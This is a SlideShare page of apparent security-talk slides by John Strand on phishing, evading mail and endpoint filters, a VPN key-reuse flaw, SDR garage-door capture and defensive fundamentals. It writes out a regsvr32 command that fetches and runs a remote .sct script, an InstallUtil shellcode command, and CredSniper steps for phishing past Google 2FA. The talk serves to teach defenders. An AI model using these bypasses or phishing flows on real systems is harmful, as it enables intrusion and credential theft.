SlideShare a Scribd company logo
If I wake evil…
Users… They Click things
I like shiny things
Do you find a need to have
multiple twitter followers?
Do you desire clicks on
Facebook?
Do you snort LinkedIn requests
like a bad 80’s bender?
Then…
Do I have a link for you!!!
Truth!
How do bad things
happen?
We seem to be in a loop
A very bad loop
Getting angry at questions…
Best AV?
Best DLP?
Best Threat Intel Feed?
Best Firewall?
Patterns and Chiasms
This.. Without the learn.
Password example
Most password complexity
requirements are:
>8 Characters
Upper/Lower/Alpha/Num
No Dictionary words
Full of fail
“We cannot fix this because of
compliance!”
Truth!
NIST Greenbook
YESSS!!!
OWA 2FA bypass - Beau
OWA/Office365 2FA
bypass - Beau
Today
Attacking Google 2FA
@dafthack and @ustayready..
In their natural environment.
Credsniper… Get
Credsniper.. Now..• Fetch the profile image
• Google Picasa API
• JavaScript XMLHttpRequest()
• Ask nicely for the password
• Behind the scenes, authenticate
• Is 2FA present?
• No? Redirect them to GDoc
agenda
• Doh! 2FA is enabled
• Which type? Extract
information
• Ask for 2FA Token nicely
• Login w/ Username + Password
+ Token
• https://www.slideshare.net/daft
hack/ok-google-how-do-i-red-
team-gsuite
Cash Cow Tipping….
Bypass everything..
AV, DLP, Firewalls, etc.
Trivial to do..
More smoke and mirrors
Get previous sessions here:
Tinyurl.com/504extra2
It Wont Get Better
Mail Providers Blocking Powershell
Macros
Appear to just look for “powershell” in macro
Well…just break up the string
“Obfuscate” Empire Macro
Do you run any of
these?
• @subTee (Casey Smith) is awesome
• Please, take a moment and follow
• By pulling down InstallUtil-ShellCode.cs and
inserting msvenom (-f csharp) into it
• Compile with the csc.exe tool
• Awesome! Because it does not need a full Visual
Studio Environment
• Walkthrough here:
• http://www.blackhillsinfosec.com/?p=4881
• @subTee here:
• http://subt0x10.blogspot.com/?m=1
InstallUtil-ShellCode.cs
InstallUtil.exe /logfile= /LogToConsole=false /U
exeshell.exe
Is this some kind of joke? .sct files?/?
Huh? No joke.
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
• Yea… regsvr32 can take a url
• It is Proxy aware
• Uses TLS
• Is a signed MS binary…
• http://subt0x10.blogspot.com/2016/04/bypass-
application-whitelisting-script.html?m=1
.sct… Running it
Advanced Endpoint
Security
We are seeing Vision (Hi Dave!!),
Cylance, Bit9 (to a lesser extent),
CrowdStrike, etc. on more tests
Most are train wrecks… Total train wrecks…
White listing is a thing… Get used to it
Smaller organizations doing much better
Larger orgs getting it… Yea, scary…
Do not base purchases on a companies
marketing budget…
http://securityweekly.com Copyright 2014
Attacking a VPN
FatPipe
• Found by Joff Thyer
• They have not responded
in months…
• Problem with key reuse
• If the same key is used…
For all installations
• I can steal that key
• And decrypt on the fly
http://securityweekly.com Copyright 2014
Bruce Cries...
http://securityweekly.com Copyright 2014
ECM
http://securityweekly.com Copyright 2014
Quick!! To Python!
http://securityweekly.com Copyright 2014
Results!!
http://securityweekly.com Copyright 2014
Lesson
• Exploits are not always buffer/heap overflows
• We need to look deeper into the logic of
things.
http://securityweekly.com Copyright 2014
SDR.. Is Awesome!
300/315/390 MHz
http://securityweekly.com Copyright 2014
But Can Be frustrating..
http://securityweekly.com Copyright 2014
Stealing your garage
door opener…
http://securityweekly.com Copyright 2014
Binary!
http://securityweekly.com Copyright 2014
WAV to bin..
Partial…
http://securityweekly.com Copyright 2014
Lesson
• Security is moving on
• Not just OS and Web security
http://securityweekly.com Copyright 2014
Stop me
New Fundamentals
• App Locker and SRP
• Long Passwords
• Two Factor Auth
• Firewall Everything
• Internet Whitelisting
• Regularly Test Things
• Assume you will be
compromised.. Plan
Accordingly!!!!
http://securityweekly.com Copyright 2014
The RITA Hunt Solution
• Parse Bro Data Sources
• Extract Data of Interest around Network /
Application Sessions
• Use Math and Statistical Methods to Find
Anomalous Activity
• Enable Security Analysts to Visualize and
Identify potential trouble makers.
http://securityweekly.com Copyright 2014
What did you think security
was going to be?
http://securityweekly.com Copyright 2014
Lets Practice!
Thanks To Mark Baggett!!!
http://securityweekly.com Copyright 2014
More! More Practice!
http://securityweekly.com Copyright 2014
Want this?
And other things….
http://tinyurl.com/504extra2
http://securityweekly.com Copyright 2014
A note on architecture
http://securityweekly.com Copyright 2014
Thanks for attending!
• John Strand
- @strandjs
- www.bhis.co
- john@bhis.co
Puppies Make It All Better

More Related Content

Similar to If i wake evil 360

Meaghan technology report
Meaghan technology reportMeaghan technology report
Meaghan technology report
Marq2014
 
Level Up - A Career in Security
Level Up - A Career in SecurityLevel Up - A Career in Security
Level Up - A Career in Security
Gabriel Mathenge
 
Corp Web Risks and Concerns
Corp Web Risks and ConcernsCorp Web Risks and Concerns
Corp Web Risks and Concerns
PINT Inc
 
I hack you hack we all hack
I hack you hack we all hackI hack you hack we all hack
I hack you hack we all hack
KaraMichelleHarkins
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Tyler Shields
 
An Introduction To IT Security And Privacy In Libraries & Anywhere
An Introduction To IT Security And Privacy In Libraries & AnywhereAn Introduction To IT Security And Privacy In Libraries & Anywhere
An Introduction To IT Security And Privacy In Libraries & Anywhere
Blake Carver
 
Hushcon 2016 Keynote: Test for Echo
Hushcon 2016 Keynote: Test for EchoHushcon 2016 Keynote: Test for Echo
Hushcon 2016 Keynote: Test for Echo
Deja vu Security
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DA
Neil Lines
 
Cybercrime and the Developer Java2Days 2016 Sofia
Cybercrime and the Developer Java2Days 2016 SofiaCybercrime and the Developer Java2Days 2016 Sofia
Cybercrime and the Developer Java2Days 2016 Sofia
Steve Poole
 
Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for Sitecore
PINT Inc
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
Avansa Mid- en Zuidwest
 
Resisting The Feature Creature
Resisting The Feature CreatureResisting The Feature Creature
Resisting The Feature Creature
Christian Heilmann
 
Special Topics Day for Engineering Innovation Lecture on Cybersecurity
Special Topics Day for Engineering Innovation Lecture on CybersecuritySpecial Topics Day for Engineering Innovation Lecture on Cybersecurity
Special Topics Day for Engineering Innovation Lecture on Cybersecurity
Michael Rushanan
 
Password and Account Management Strategies - April 2019
Password and Account Management Strategies - April 2019Password and Account Management Strategies - April 2019
Password and Account Management Strategies - April 2019
Kimberley Dray
 
Things that go bump on the web - Web Application Security
Things that go bump on the web - Web Application SecurityThings that go bump on the web - Web Application Security
Things that go bump on the web - Web Application Security
Christian Heilmann
 
Practical exploitation and social engineering
Practical exploitation and social engineeringPractical exploitation and social engineering
Practical exploitation and social engineering
Tiago Henriques
 
Do bad things happen on Windows
Do bad things happen on WindowsDo bad things happen on Windows
Do bad things happen on Windows
Jesse Moore
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycle
Jarrod Overson
 
Hacking For Innovation
Hacking For InnovationHacking For Innovation
Hacking For Innovation
Christian Heilmann
 
Hacking the Company : Risks with carbon-based lifeforms using vulnerable systems
Hacking the Company : Risks with carbon-based lifeforms using vulnerable systemsHacking the Company : Risks with carbon-based lifeforms using vulnerable systems
Hacking the Company : Risks with carbon-based lifeforms using vulnerable systems
khalavak
 

Similar to If i wake evil 360 (20)

Meaghan technology report
Meaghan technology reportMeaghan technology report
Meaghan technology report
 
Level Up - A Career in Security
Level Up - A Career in SecurityLevel Up - A Career in Security
Level Up - A Career in Security
 
Corp Web Risks and Concerns
Corp Web Risks and ConcernsCorp Web Risks and Concerns
Corp Web Risks and Concerns
 
I hack you hack we all hack
I hack you hack we all hackI hack you hack we all hack
I hack you hack we all hack
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
 
An Introduction To IT Security And Privacy In Libraries & Anywhere
An Introduction To IT Security And Privacy In Libraries & AnywhereAn Introduction To IT Security And Privacy In Libraries & Anywhere
An Introduction To IT Security And Privacy In Libraries & Anywhere
 
Hushcon 2016 Keynote: Test for Echo
Hushcon 2016 Keynote: Test for EchoHushcon 2016 Keynote: Test for Echo
Hushcon 2016 Keynote: Test for Echo
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DA
 
Cybercrime and the Developer Java2Days 2016 Sofia
Cybercrime and the Developer Java2Days 2016 SofiaCybercrime and the Developer Java2Days 2016 Sofia
Cybercrime and the Developer Java2Days 2016 Sofia
 
Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for Sitecore
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
 
Resisting The Feature Creature
Resisting The Feature CreatureResisting The Feature Creature
Resisting The Feature Creature
 
Special Topics Day for Engineering Innovation Lecture on Cybersecurity
Special Topics Day for Engineering Innovation Lecture on CybersecuritySpecial Topics Day for Engineering Innovation Lecture on Cybersecurity
Special Topics Day for Engineering Innovation Lecture on Cybersecurity
 
Password and Account Management Strategies - April 2019
Password and Account Management Strategies - April 2019Password and Account Management Strategies - April 2019
Password and Account Management Strategies - April 2019
 
Things that go bump on the web - Web Application Security
Things that go bump on the web - Web Application SecurityThings that go bump on the web - Web Application Security
Things that go bump on the web - Web Application Security
 
Practical exploitation and social engineering
Practical exploitation and social engineeringPractical exploitation and social engineering
Practical exploitation and social engineering
 
Do bad things happen on Windows
Do bad things happen on WindowsDo bad things happen on Windows
Do bad things happen on Windows
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycle
 
Hacking For Innovation
Hacking For InnovationHacking For Innovation
Hacking For Innovation
 
Hacking the Company : Risks with carbon-based lifeforms using vulnerable systems
Hacking the Company : Risks with carbon-based lifeforms using vulnerable systemsHacking the Company : Risks with carbon-based lifeforms using vulnerable systems
Hacking the Company : Risks with carbon-based lifeforms using vulnerable systems
 

Recently uploaded

Corporate Presentation Probe June 2024.pdf
Corporate Presentation Probe June 2024.pdfCorporate Presentation Probe June 2024.pdf
Corporate Presentation Probe June 2024.pdf
Probe Gold
 
Collective Mining | Corporate Presentation - June 2024
Collective Mining | Corporate Presentation - June 2024Collective Mining | Corporate Presentation - June 2024
Collective Mining | Corporate Presentation - June 2024
CollectiveMining1
 
一比一原版(UW毕业证)华盛顿大学毕业证成绩单专业办理
一比一原版(UW毕业证)华盛顿大学毕业证成绩单专业办理一比一原版(UW毕业证)华盛顿大学毕业证成绩单专业办理
一比一原版(UW毕业证)华盛顿大学毕业证成绩单专业办理
ybout
 
Osisko Development - Investor Presentation - June 24
Osisko Development - Investor Presentation - June 24Osisko Development - Investor Presentation - June 24
Osisko Development - Investor Presentation - June 24
Philip Rabenok
 
Osisko Gold Royalties Ltd - Corporate Presentation, June 2024
Osisko Gold Royalties Ltd - Corporate Presentation, June 2024Osisko Gold Royalties Ltd - Corporate Presentation, June 2024
Osisko Gold Royalties Ltd - Corporate Presentation, June 2024
Osisko Gold Royalties Ltd
 
Snam 2023-27 Industrial Plan - Financial Presentation
Snam 2023-27 Industrial Plan - Financial PresentationSnam 2023-27 Industrial Plan - Financial Presentation
Snam 2023-27 Industrial Plan - Financial Presentation
Valentina Ottini
 
2024-deutsche-bank-global-consumer-conference.pdf
2024-deutsche-bank-global-consumer-conference.pdf2024-deutsche-bank-global-consumer-conference.pdf
2024-deutsche-bank-global-consumer-conference.pdf
Sysco_Investors
 

Recently uploaded (7)

Corporate Presentation Probe June 2024.pdf
Corporate Presentation Probe June 2024.pdfCorporate Presentation Probe June 2024.pdf
Corporate Presentation Probe June 2024.pdf
 
Collective Mining | Corporate Presentation - June 2024
Collective Mining | Corporate Presentation - June 2024Collective Mining | Corporate Presentation - June 2024
Collective Mining | Corporate Presentation - June 2024
 
一比一原版(UW毕业证)华盛顿大学毕业证成绩单专业办理
一比一原版(UW毕业证)华盛顿大学毕业证成绩单专业办理一比一原版(UW毕业证)华盛顿大学毕业证成绩单专业办理
一比一原版(UW毕业证)华盛顿大学毕业证成绩单专业办理
 
Osisko Development - Investor Presentation - June 24
Osisko Development - Investor Presentation - June 24Osisko Development - Investor Presentation - June 24
Osisko Development - Investor Presentation - June 24
 
Osisko Gold Royalties Ltd - Corporate Presentation, June 2024
Osisko Gold Royalties Ltd - Corporate Presentation, June 2024Osisko Gold Royalties Ltd - Corporate Presentation, June 2024
Osisko Gold Royalties Ltd - Corporate Presentation, June 2024
 
Snam 2023-27 Industrial Plan - Financial Presentation
Snam 2023-27 Industrial Plan - Financial PresentationSnam 2023-27 Industrial Plan - Financial Presentation
Snam 2023-27 Industrial Plan - Financial Presentation
 
2024-deutsche-bank-global-consumer-conference.pdf
2024-deutsche-bank-global-consumer-conference.pdf2024-deutsche-bank-global-consumer-conference.pdf
2024-deutsche-bank-global-consumer-conference.pdf
 

If i wake evil 360

Editor's Notes

  1. Intro slide, change your name